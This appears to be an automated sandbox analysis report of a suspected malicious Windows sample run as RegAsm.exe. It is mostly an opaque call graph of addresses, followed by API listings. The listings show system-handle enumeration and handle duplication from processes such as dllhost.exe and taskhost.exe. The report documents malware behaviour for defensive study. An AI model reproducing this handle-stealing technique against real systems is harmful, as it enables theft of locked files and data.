memset 39620->39622 39621->39433 39622->39621 39624 4438b5 11 API calls 39623->39624 39625 41525d 39624->39625 39625->39438 39627 444328 39626->39627 39628 444423 39627->39628 39629 44434e 39627->39629 39693 4446ea 11 API calls 39628->39693 39630 432d4e 3 API calls 39629->39630 39632 44435a 39630->39632 39634 444375 39632->39634 39639 44438b 39632->39639 39633 432d4e 3 API calls 39635 4443ec 39633->39635 39636 416935 16 API calls 39634->39636 39637 444381 39635->39637 39638 416935 16 API calls 39635->39638 39636->39637 39637->39444 39638->39637 39639->39633 39641 432d58 39640->39641 39643 432d65 39640->39643 39694 432cc4 memset memset memcpy 39641->39694 39643->39452 39645 41eee2 39644->39645 39646 415a6d memset 39645->39646 39647 41ef23 39646->39647 39648 415a6d memset 39647->39648 39659 41ef2d 39647->39659 39649 41ef42 39648->39649 39652 41ef49 39649->39652 39695 41b7d9 39649->39695 39651 41ef66 39651->39652 39653 41ef74 memset 39651->39653 39652->39659 39710 41b321 100 API calls 39652->39710 39654 41ef91 39653->39654 39657 41ef9e 39653->39657 39657->39652 39659->39455 39661 433033 39660->39661 39662 433042 39660->39662 39716 421f20 memset 39661->39716 39717 415a91 39662->39717 39665 43303f 39665->39461 39693->39637 39694->39643 39696 41b812 39695->39696 39704 41b884 39696->39704 39706 41b849 39696->39706 39711 444706 11 API calls 39696->39711 39697 415a6d memset 39698 41b8c2 39697->39698 39699 41b980 39698->39699 39700 41b902 memcpy memcpy memcpy memcpy memcpy 39698->39700 39698->39706 39700->39699 39704->39697 39704->39706 39706->39651 39710->39659 39711->39704 39716->39665 39718 415a9d 39717->39718 39719 415ab3 39718->39719 39720 415aa4 memset 39718->39720 39719->39665 39720->39719 39767 41703f 39755->39767 39757 43847a 39758 43848a 39757->39758 39759 43847e 39757->39759 39774 438270 39758->39774 39804 4446ea 11 API calls 39759->39804 39764 4384bb 39765 438270 133 API calls 39764->39765 39766 438488 39765->39766 39766->39475 39768 417044 39767->39768 39769 41705c 39767->39769 39773 417055 39768->39773 39806 416760 11 API calls 39768->39806 39770 417075 39769->39770 39807 41707a 11 API calls 39769->39807 39770->39757 39773->39757 39775 415a91 memset 39774->39775 39776 43828d 39775->39776 39777 438297 39776->39777 39778 438341 39776->39778 39780 4382d6 39776->39780 39779 415c7d 16 API calls 39777->39779 39808 44358f 39778->39808 39782 438458 39779->39782 39783 4382fb 39780->39783 39784 4382db 39780->39784 39782->39766 39805 424f26 122 API calls 39782->39805 39839 415c23 memcpy 39783->39839 39785 416935 16 API calls 39784->39785 39787 4382e9 39785->39787 39789 415c7d 16 API calls 39787->39789 39788 438305 39791 44358f 19 API calls 39788->39791 39794 438318 39788->39794 39789->39777 39790 438373 39793 438383 39790->39793 39840 4300e8 memset memset memcpy 39790->39840 39791->39794 39797 4383cd 39793->39797 39841 415c23 memcpy 39793->39841 39794->39790 39834 43819e 39794->39834 39796 4383f5 39800 438404 39796->39800 39801 43841c 39796->39801 39797->39796 39842 42453e 122 API calls 39797->39842 39803 416935 16 API calls 39800->39803 39802 416935 16 API calls 39801->39802 39802->39777 39803->39777 39804->39766 39805->39764 39806->39773 39807->39768 39809 4435be 39808->39809 39811 443676 39809->39811 39814 4436ce 39809->39814 39817 442ff8 19 API calls 39809->39817 39818 44366c 39809->39818 39832 44360c 39809->39832 39810 443758 39813 441409 memset 39810->39813 39822 443775 39810->39822 39811->39810 39812 443737 39811->39812 39815 442ff8 19 API calls 39811->39815 39816 442ff8 19 API calls 39812->39816 39813->39810 39820 4165ff 11 API calls 39814->39820 39815->39812 39816->39810 39817->39809 39821 4169a7 11 API calls 39818->39821 39819 4437be 39823 416760 11 API calls 39819->39823 39824 4437de 39819->39824 39820->39811 39821->39811 39822->39819 39828 415c56 11 API calls 39822->39828 39823->39824 39825 42463b memset memcpy 39824->39825 39827 443801 39824->39827 39825->39827 39826 443826 39830 43bd08 memset 39826->39830 39827->39826 39829 43024d memset 39827->39829 39828->39819 39829->39826 39831 443837 39830->39831 39831->39832 39833 43024d memset 39831->39833 39832->39794 39833->39831 39835 438246 39834->39835 39837 4381ba 39834->39837 39835->39790 39836 41f432 109 API calls 39836->39837 39837->39835 39837->39836 39838 41f638 103 API calls 39837->39838 39838->39837 39839->39788 39840->39793 39841->39797 39842->39796 39843->39479 39844->39495 39845->39486 39846->39490 39847->39491 39848->39495 39850 424f1f 39849->39850 39851 424f0c 39849->39851 39870 424eea 11 API calls 39850->39870 39869 416760 11 API calls 39851->39869 39854 424f18 39854->39501 39855 424f24 39855->39501 39856->39505 39858 425108 39857->39858 39864 42510d 39857->39864 39903 424f74 123 API calls 39858->39903 39861 42516e 39863 415c7d 16 API calls 39861->39863 39862 425115 39862->39507 39863->39862 39864->39862 39871 42569b 39864->39871 39865->39507 39866->39507 39867->39515 39868->39514 39869->39854 39870->39855 39881 4256f1 39871->39881 39899 4259c2 39871->39899 39876 4260dd 39915 424251 119 API calls 39876->39915 39877 429a4d 39884 429a66 39877->39884 39885 429a9b 39877->39885 39881->39877 39882 422aeb memset memcpy memcpy 39881->39882 39887 4260a1 39881->39887 39896 4259da 39881->39896 39897 429ac1 39881->39897 39881->39899 39902 425a38 39881->39902 39904 4227f0 memset memcpy 39881->39904 39905 422b84 15 API calls 39881->39905 39906 422b5d memset memcpy memcpy 39881->39906 39907 422640 13 API calls 39881->39907 39909 4241fc 11 API calls 39881->39909 39910 42413a 89 API calls 39881->39910 39882->39881 39916 415c56 11 API calls 39884->39916 39886 429a96 39885->39886 39918 416760 11 API calls 39885->39918 39919 424251 119 API calls 39886->39919 39913 415c56 11 API calls 39887->39913 39889 429a7a 39917 416760 11 API calls 39889->39917 39914 416760 11 API calls 39896->39914 39898 425ad6 39897->39898 39920 415c56 11 API calls 39897->39920 39898->39861 39899->39898 39908 415c56 11 API calls 39899->39908 39902->39899 39911 422640 13 API calls 39902->39911 39912 4226e0 12 API calls 39902->39912 39903->39864 39904->39881 39905->39881 39906->39881 39907->39881 39908->39896 39909->39881 39910->39881 39911->39902 39912->39902 39913->39896 39914->39876 39915->39898 39916->39889 39917->39886 39918->39886 39919->39897 39920->39896 39921->38958 39922->38966 39932 44def7 39933 44df07 39932->39933 39934 44df00 ??3@YAXPAX 39932->39934 39935 44df17 39933->39935 39936 44df10 ??3@YAXPAX 39933->39936 39934->39933 39937 44df27 39935->39937 39938 44df20 ??3@YAXPAX 39935->39938 39936->39935 39939 44df37 39937->39939 39940 44df30 ??3@YAXPAX 39937->39940 39938->39937 39940->39939 37697 44dea5 37698 44deb5 FreeLibrary 37697->37698 37699 44dec3 37697->37699 37698->37699 39941 4148b6 FindResourceW 39942 4148cf SizeofResource 39941->39942 39945 4148f9 39941->39945 39943 4148e0 LoadResource 39942->39943 39942->39945 39944 4148ee LockResource 39943->39944 39943->39945 39944->39945 37876 415304 free 39946 441b3f 39956 43a9f6 39946->39956 39948 441b61 40129 4386af memset 39948->40129 39950 44189a 39951 442bd4 39950->39951 39952 4418e2 39950->39952 39953 4418ea 39951->39953 40131 441409 memset 39951->40131 39952->39953 40130 4414a9 12 API calls 39952->40130 39957 43aa20 39956->39957 39964 43aadf 39956->39964 39958 43aa34 memset 39957->39958 39957->39964 39959 43aa56 39958->39959 39960 43aa4d 39958->39960 40132 43a6e7 39959->40132 40140 42c02e memset 39960->40140 39964->39948 39966 43aad3 40142 4169a7 11 API calls 39966->40142 39967 43aaae 39967->39964 39967->39966 39982 43aae5 39967->39982 39968 43ac18 39971 43ac47 39968->39971 40144 42bbd5 memcpy memcpy memcpy memset memcpy 39968->40144 39972 43aca8 39971->39972 40145 438eed 16 API calls 39971->40145 39975 43acd5 39972->39975 40147 4233ae 11 API calls 39972->40147 40148 423426 11 API calls 39975->40148 39976 43ac87 40146 4233c5 16 API calls 39976->40146 39980 43ace1 40149 439811 162 API calls 39980->40149 39981 43a9f6 160 API calls 39981->39982 39982->39964 39982->39968 39982->39981 40143 439bbb 22 API calls 39982->40143 39984 43acfd 39990 43ad2c 39984->39990 40150 438eed 16 API calls 39984->40150 39986 43ad19 40151 4233c5 16 API calls 39986->40151 39987 43ad58 40152 44081d 162 API calls 39987->40152 39990->39987 39993 43add9 39990->39993 39992 43ae3a memset 39994 43ae73 39992->39994 39993->39993 40156 423426 11 API calls 39993->40156 40157 42e1c0 146 API calls 39994->40157 39995 43adab 40154 438c4e 162 API calls 39995->40154 39998 43ad6c 39998->39964 39998->39995 40153 42370b memset memcpy memset 39998->40153 39999 43adcc 40155 440f84 12 API calls 39999->40155 40000 43ae96 40158 42e1c0 146 API calls 40000->40158 40004 43aea8 40005 43aec1 40004->40005 40159 42e199 146 API calls 40004->40159 40007 43af00 40005->40007 40160 42e1c0 146 API calls 40005->40160 40007->39964 40010 43af1a 40007->40010 40011 43b3d9 40007->40011 40161 438eed 16 API calls 40010->40161 40016 43b3f6 40011->40016 40021 43b4c8 40011->40021 40013 43b60f 40013->39964 40220 4393a5 17 API calls 40013->40220 40014 43af2f 40162 4233c5 16 API calls 40014->40162 40202 432878 12 API calls 40016->40202 40018 43af51 40163 423426 11 API calls 40018->40163 40020 43b4f2 40209 43a76c 21 API calls 40020->40209 40021->40020 40208 42bbd5 memcpy memcpy memcpy memset memcpy 40021->40208 40023 43af7d 40164 423426 11 API calls 40023->40164 40027 43b529 40210 44081d 162 API calls 40027->40210 40028 43b462 40204 423330 11 API calls 40028->40204 40029 43af94 40165 423330 11 API calls 40029->40165 40033 43b47e 40037 43b497 40033->40037 40205 42374a memcpy memset memcpy memcpy memcpy 40033->40205 40034 43b544 40038 43b55c 40034->40038 40211 42c02e memset 40034->40211 40035 43b428 40035->40028 40203 432b60 16 API calls 40035->40203 40036 43afca 40166 423330 11 API calls 40036->40166 40206 4233ae 11 API calls 40037->40206 40212 43a87a 162 API calls 40038->40212 40044 43afdb 40167 4233ae 11 API calls 40044->40167 40046 43b56c 40049 43b58a 40046->40049 40213 423330 11 API calls 40046->40213 40047 43b4b1 40207 423399 11 API calls 40047->40207 40048 43afee 40168 44081d 162 API calls 40048->40168 40214 440f84 12 API calls 40049->40214 40054 43b4c1 40216 42db80 162 API calls 40054->40216 40056 43b592 40215 43a82f 16 API calls 40056->40215 40059 43b5b4 40217 438c4e 162 API calls 40059->40217 40061 43b5cf 40218 42c02e memset 40061->40218 40063 43b1ef 40179 4233c5 16 API calls 40063->40179 40064 43b005 40064->39964 40067 43b01f 40064->40067 40169 42d836 162 API calls 40064->40169 40067->40063 40177 423330 11 API calls 40067->40177 40178 42d71d 162 API calls 40067->40178 40068 43b212 40180 423330 11 API calls 40068->40180 40069 43b087 40170 4233ae 11 API calls 40069->40170 40071 43add4 40071->40013 40219 438f86 16 API calls 40071->40219 40075 43b22a 40181 42ccb5 11 API calls 40075->40181 40077 43b10f 40173 423330 11 API calls 40077->40173 40078 43b23f 40182 4233ae 11 API calls 40078->40182 40080 43b257 40183 4233ae 11 API calls 40080->40183 40084 43b129 40174 4233ae 11 API calls 40084->40174 40085 43b26e 40184 4233ae 11 API calls 40085->40184 40088 43b09a 40088->40077 40171 42cc15 19 API calls 40088->40171 40172 4233ae 11 API calls 40088->40172 40089 43b282 40185 43a87a 162 API calls 40089->40185 40091 43b13c 40175 440f84 12 API calls 40091->40175 40093 43b29d 40186 423330 11 API calls 40093->40186 40096 43b15f 40176 4233ae 11 API calls 40096->40176 40097 43b2af 40099 43b2b8 40097->40099 40100 43b2ce 40097->40100 40187 4233ae 11 API calls 40099->40187 40188 440f84 12 API calls 40100->40188 40103 43b2da 40189 42370b memset memcpy memset 40103->40189 40104 43b2c9 40190 4233ae 11 API calls 40104->40190 40107 43b2f9 40191 423330 11 API calls 40107->40191 40109 43b30b 40192 423330 11 API calls 40109->40192 40111 43b325 40193 423399 11 API calls 40111->40193 40113 43b332 40194 4233ae 11 API calls 40113->40194 40115 43b354 40195 423399 11 API calls 40115->40195 40117 43b364 40196 43a82f 16 API calls 40117->40196 40119 43b370 40197 42db80 162 API calls 40119->40197 40121 43b380 40198 438c4e 162 API calls 40121->40198 40123 43b39e 40199 423399 11 API calls 40123->40199 40125 43b3ae 40200 43a76c 21 API calls 40125->40200 40127 43b3c3 40201 423399 11 API calls 40127->40201 40129->39950 40130->39953 40131->39951 40133 43a6f5 40132->40133 40139 43a765 40132->40139 40133->40139 40221 42a115 40133->40221 40137 43a73d 40138 42a115 146 API calls 40137->40138 40137->40139 40138->40139 40139->39964 40141 4397fd memset 40139->40141 40140->39959 40141->39967 40142->39964 40143->39982 40144->39971 40145->39976 40146->39972 40147->39975 40148->39980 40149->39984 40150->39986 40151->39990 40152->39998 40153->39995 40154->39999 40155->40071 40156->39992 40157->40000 40158->40004 40159->40005 40160->40005 40161->40014 40162->40018 40163->40023 40164->40029 40165->40036 40166->40044 40167->40048 40168->40064 40169->40069 40170->40088 40171->40088 40172->40088 40173->40084 40174->40091 40175->40096 40176->40067 40177->40067 40178->40067 40179->40068 40180->40075 40181->40078 40182->40080 40183->40085 40184->40089 40185->40093 40186->40097 40187->40104 40188->40103 40189->40104 40190->40107 40191->40109 40192->40111 40193->40113 40194->40115 40195->40117 40196->40119 40197->40121 40198->40123 40199->40125 40200->40127 40201->40071 40202->40035 40203->40028 40204->40033 40205->40037 40206->40047 40207->40054 40208->40020 40209->40027 40210->40034 40211->40038 40212->40046 40213->40049 40214->40056 40215->40054 40216->40059 40217->40061 40218->40071 40219->40013 40220->39964 40222 42a175 40221->40222 40224 42a122 40221->40224 40222->40139 40227 42b13b 146 API calls 40222->40227 40224->40222 40225 42a115 146 API calls 40224->40225 40228 43a174 40224->40228 40252 42a0a8 146 API calls 40224->40252 40225->40224 40227->40137 40242 43a196 40228->40242 40243 43a19e 40228->40243 40229 43a306 40229->40242 40268 4388c4 14 API calls 40229->40268 40232 42a115 146 API calls 40232->40243 40233 415a91 memset 40233->40243 40234 43a642 40234->40242 40272 4169a7 11 API calls 40234->40272 40238 43a635 40271 42c02e memset 40238->40271 40242->40224 40243->40229 40243->40232 40243->40233 40243->40242 40253 42ff8c 40243->40253 40261 4165ff 40243->40261 40264 439504 13 API calls 40243->40264 40265 4312d0 146 API calls 40243->40265 40266 42be4c memcpy memcpy memcpy memset memcpy 40243->40266 40267 43a121 11 API calls 40243->40267 40244 43a325 40244->40234 40244->40238 40244->40242 40246 42bf4c 14 API calls 40244->40246 40247 4169a7 11 API calls 40244->40247 40248 42b5b5 memset memcpy 40244->40248 40251 4165ff 11 API calls 40244->40251 40269 42b63e 14 API calls 40244->40269 40270 42bfcf memcpy 40244->40270 40246->40244 40247->40244 40248->40244 40251->40244 40252->40224 40273 43817e 40253->40273 40255 42ff99 40256 42ffe3 40255->40256 40257 42ffd0 40255->40257 40260 42ff9d 40255->40260 40278 4169a7 11 API calls 40256->40278 40277 4169a7 11 API calls 40257->40277 40260->40243 40262 4165a0 11 API calls 40261->40262 40263 41660d 40262->40263 40263->40243 40264->40243 40265->40243 40266->40243 40267->40243 40268->40244 40269->40244 40270->40244 40271->40234 40272->40242 40274 438187 40273->40274 40275 438192 40273->40275 40279 4380f6 40274->40279 40275->40255 40277->40260 40278->40260 40281 43811f 40279->40281 40280 438164 40280->40275 40281->40280 40284 437e5e 40281->40284 40307 4300e8 memset memset memcpy 40281->40307 40308 437d3c 40284->40308 40286 437eb3 40286->40281 40287 437ea9 40287->40286 40291 437f22 40287->40291 40323 41f432 40287->40323 40290 437f06 40370 415c56 11 API calls 40290->40370 40294 437f7f 40291->40294 40295 432d4e 3 API calls 40291->40295 40293 437f95 40371 415c56 11 API calls 40293->40371 40294->40293 40296 43802b 40294->40296 40295->40294 40298 4165ff 11 API calls 40296->40298 40299 438054 40298->40299 40334 437371 40299->40334 40302 43806b 40303 438094 40302->40303 40372 42f50e 137 API calls 40302->40372 40305 437fa3 40303->40305 40373 4300e8 memset memset memcpy 40303->40373 40305->40286 40374 41f638 103 API calls 40305->40374 40307->40281 40309 437d69 40308->40309 40312 437d80 40308->40312 40375 437ccb 11 API calls 40309->40375 40311 437d76 40311->40287 40312->40311 40313 437da3 40312->40313 40315 437d90 40312->40315 40316 438460 133 API calls 40313->40316 40315->40311 40379 437ccb 11 API calls 40315->40379 40318 437dcb 40316->40318 40322 437de8 40318->40322 40376 444283 13 API calls 40318->40376 40320 437dfc 40377 437ccb 11 API calls 40320->40377 40378 424f26 122 API calls 40322->40378 40324 41f54d 40323->40324 40330 41f44f 40323->40330 40325 41f466 40324->40325 40409 41c635 memset memset 40324->40409 40325->40290 40325->40291 40330->40325 40332 41f50b 40330->40332 40380 41f1a5 40330->40380 40405 41c06f memcmp 40330->40405 40406 41f3b1 89 API calls 40330->40406 40407 41f398 85 API calls 40330->40407 40332->40324 40332->40325 40408 41c295 85 API calls 40332->40408 40335 41703f 11 API calls 40334->40335 40336 437399 40335->40336 40337 43739d 40336->40337 40340 4373ac 40336->40340 40410 4446ea 11 API calls 40337->40410 40339 4373a7 40339->40302 40341 416935 16 API calls 40340->40341 40342 4373ca 40341->40342 40343 438460 133 API calls 40342->40343 40348 4251c4 136 API calls 40342->40348 40352 415a91 memset 40342->40352 40355 43758f 40342->40355 40367 437584 40342->40367 40369 437d3c 134 API calls 40342->40369 40411 425433 13 API calls 40342->40411 40412 425413 17 API calls 40342->40412 40413 42533e 16 API calls 40342->40413 40414 42538f 16 API calls 40342->40414 40415 42453e 122 API calls 40342->40415 40343->40342 40344 4375bc 40346 415c7d 16 API calls 40344->40346 40347 4375d2 40346->40347 40347->40339 40349 4442e6 11 API calls 40347->40349 40348->40342 40350 4375e2 40349->40350 40350->40339 40418 444283 13 API calls 40350->40418 40352->40342 40416 42453e 122 API calls 40355->40416 40358 4375f4 40361 437620 40358->40361 40362 43760b 40358->40362 40360 43759f 40363 416935 16 API calls 40360->40363 40365 416935 16 API calls 40361->40365 40419 444283 13 API calls 40362->40419 40363->40367 40365->40339 40367->40344 40417 42453e 122 API calls 40367->40417 40368 437612 memcpy 40368->40339 40369->40342 40370->40286 40371->40305 40372->40303 40373->40305 40374->40286 40375->40311 40376->40320 40377->40322 40378->40311 40379->40311 40381 41bc3b 100 API calls 40380->40381 40382 41f1b4 40381->40382 40383 41edad 85 API calls 40382->40383 40390 41f282 40382->40390 40384 41f1cb 40383->40384 40385 41f1f5 memcmp 40384->40385 40386 41f20e 40384->40386 40384->40390 40385->40386 40387 41f21b memcmp 40386->40387 40386->40390 40388 41f326 40387->40388 40391 41f23d 40387->40391 40389 41ee6b 85 API calls 40388->40389 40388->40390 40389->40390 40390->40330 40391->40388 40392 41f28e memcmp 40391->40392 40394 41c8df 55 API calls 40391->40394 40392->40388 40393 41f2a9 40392->40393 40393->40388 40396 41f308 40393->40396 40397 41f2d8 40393->40397 40395 41f269 40394->40395 40395->40388 40398 41f287 40395->40398 40399 41f27a 40395->40399 40396->40388 40403 4446ce 11 API calls 40396->40403 40400 41ee6b 85 API calls 40397->40400 40398->40392 40401 41ee6b 85 API calls 40399->40401 40402 41f2e0 40400->40402 40401->40390 40404 41b1ca memset 40402->40404 40403->40388 40404->40390 40405->40330 40406->40330 40407->40330 40408->40324 40409->40325 40410->40339 40411->40342 40412->40342 40413->40342 40414->40342 40415->40342 40416->40360 40417->40344 40418->40358 40419->40368 40420 41493c EnumResourceNamesW 37701 4287c1 37702 4287d2 37701->37702 37703 429ac1 37701->37703 37705 428818 37702->37705 37706 42881f 37702->37706 37725 425711 37702->37725 37715 425ad6 37703->37715 37771 415c56 11 API calls 37703->37771 37738 42013a 37705->37738 37766 420244 96 API calls 37706->37766 37708 4260dd 37765 424251 119 API calls 37708->37765 37713 4259da 37764 416760 11 API calls 37713->37764 37716 429a4d 37721 429a66 37716->37721 37722 429a9b 37716->37722 37719 422aeb memset memcpy memcpy 37719->37725 37767 415c56 11 API calls 37721->37767 37723 429a96 37722->37723 37769 416760 11 API calls 37722->37769 37770 424251 119 API calls 37723->37770 37724 4260a1 37763 415c56 11 API calls 37724->37763 37725->37703 37725->37713 37725->37716 37725->37719 37725->37724 37734 4259c2 37725->37734 37737 425a38 37725->37737 37754 4227f0 memset memcpy 37725->37754 37755 422b84 15 API calls 37725->37755 37756 422b5d memset memcpy memcpy 37725->37756 37757 422640 13 API calls 37725->37757 37759 4241fc 11 API calls 37725->37759 37760 42413a 89 API calls 37725->37760 37727 429a7a 37768 416760 11 API calls 37727->37768 37734->37715 37758 415c56 11 API calls 37734->37758 37737->37734 37761 422640 13 API calls 37737->37761 37762 4226e0 12 API calls 37737->37762 37739 42014c 37738->37739 37742 420151 37738->37742 37781 41e466 96 API calls 37739->37781 37741 420162 37741->37725 37742->37741 37743 4201b3 37742->37743 37744 420229 37742->37744 37745 4201b8 37743->37745 37746 4201dc 37743->37746 37744->37741 37747 41fd5e 85 API calls 37744->37747 37772 41fbdb 37745->37772 37746->37741 37751 4201ff 37746->37751 37778 41fc4c 37746->37778 37747->37741 37751->37741 37753 42013a 96 API calls 37751->37753 37753->37741 37754->37725 37755->37725 37756->37725 37757->37725 37758->37713 37759->37725 37760->37725 37761->37737 37762->37737 37763->37713 37764->37708 37765->37715 37766->37725 37767->37727 37768->37723 37769->37723 37770->37703 37771->37713 37773 41fbf8 37772->37773 37775 41fbf1 37772->37775 37786 41ee26 37773->37786 37777 41fc39 37775->37777 37796 4446ce 11 API calls 37775->37796 37777->37741 37782 41fd5e 37777->37782 37779 41ee6b 85 API calls 37778->37779 37780 41fc5d 37779->37780 37780->37746 37781->37742 37784 41fd65 37782->37784 37783 41fdab 37783->37741 37784->37783 37785 41fbdb 85 API calls 37784->37785 37785->37784 37787 41ee41 37786->37787 37788 41ee32 37786->37788 37797 41edad 37787->37797 37800 4446ce 11 API calls 37788->37800 37791 41ee3c 37791->37775 37794 41ee58 37794->37791 37802 41ee6b 37794->37802 37796->37777 37806 41be52 37797->37806 37800->37791 37801 41eb85 11 API calls 37801->37794 37803 41ee70 37802->37803 37804 41ee78 37802->37804 37862 41bf99 85 API calls 37803->37862 37804->37791 37807 41be6f 37806->37807 37808 41be5f 37806->37808 37813 41be8c 37807->37813 37827 418c63 37807->37827 37841 4446ce 11 API calls 37808->37841 37811 41be69 37811->37791 37811->37801 37813->37811 37814 41bf3a 37813->37814 37815 41bed1 37813->37815 37825 41bee7 37813->37825 37844 4446ce 11 API calls 37814->37844 37817 41bef0 37815->37817 37820 41bee2 37815->37820 37818 41bf01 37817->37818 37817->37825 37819 41bf24 memset 37818->37819 37821 41bf14 37818->37821 37842 418a6d memset memcpy memset 37818->37842 37819->37811 37831 41ac13 37820->37831 37843 41a223 memset memcpy memset 37821->37843 37825->37811 37845 41a453 85 API calls 37825->37845 37826 41bf20 37826->37819 37830 418c72 37827->37830 37828 418c94 37828->37813 37829 418d51 memset memset 37829->37828 37830->37828 37830->37829 37832 41ac52 37831->37832 37833 41ac3f memset 37831->37833 37835 41ac6a 37832->37835 37846 41dc14 19 API calls 37832->37846 37838 41acd9 37833->37838 37837 41aca1 37835->37837 37847 41519d 37835->37847 37837->37838 37839 41acc0 memset 37837->37839 37840 41accd memcpy 37837->37840 37838->37825 37839->37838 37840->37838 37841->37811 37842->37821 37843->37826 37844->37825 37846->37835 37850 4175ed 37847->37850 37858 417570 SetFilePointer 37850->37858 37853 41760a ReadFile 37854 417637 37853->37854 37855 417627 GetLastError 37853->37855 37856 4151b3 37854->37856 37857 41763e memset 37854->37857 37855->37856 37856->37837 37857->37856 37859 4175b2 37858->37859 37860 41759c GetLastError 37858->37860 37859->37853 37859->37856 37860->37859 37861 4175a8 GetLastError 37860->37861 37861->37859 37862->37804 37863 417bc5 37864 417c61 37863->37864 37869 417bda 37863->37869 37865 417bf6 UnmapViewOfFile CloseHandle 37865->37865 37865->37869 37867 417c2c 37867->37869 37875 41851e 18 API calls 37867->37875 37869->37864 37869->37865 37869->37867 37870 4175b7 37869->37870 37871 4175d6 CloseHandle 37870->37871 37872 4175c8 37871->37872 37873 4175df 37871->37873 37872->37873 37874 4175ce Sleep 37872->37874 37873->37869 37874->37871 37875->37867 39923 4147f3 39926 414561 39923->39926 39925 414813 39927 41456d 39926->39927 39928 41457f GetPrivateProfileIntW 39926->39928 39931 4143f1 memset _itow WritePrivateProfileStringW 39927->39931 39928->39925 39930 41457a 39930->39925 39931->39930

                                                                                                                                  Executed Functions

                                                                                                                                  Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                  • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                  • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                  • memset.MSVCRT ref: 0040DF5F
                                                                                                                                  • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                  • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                  • API String ID: 2018390131-3398334509
                                                                                                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                  Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                    • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
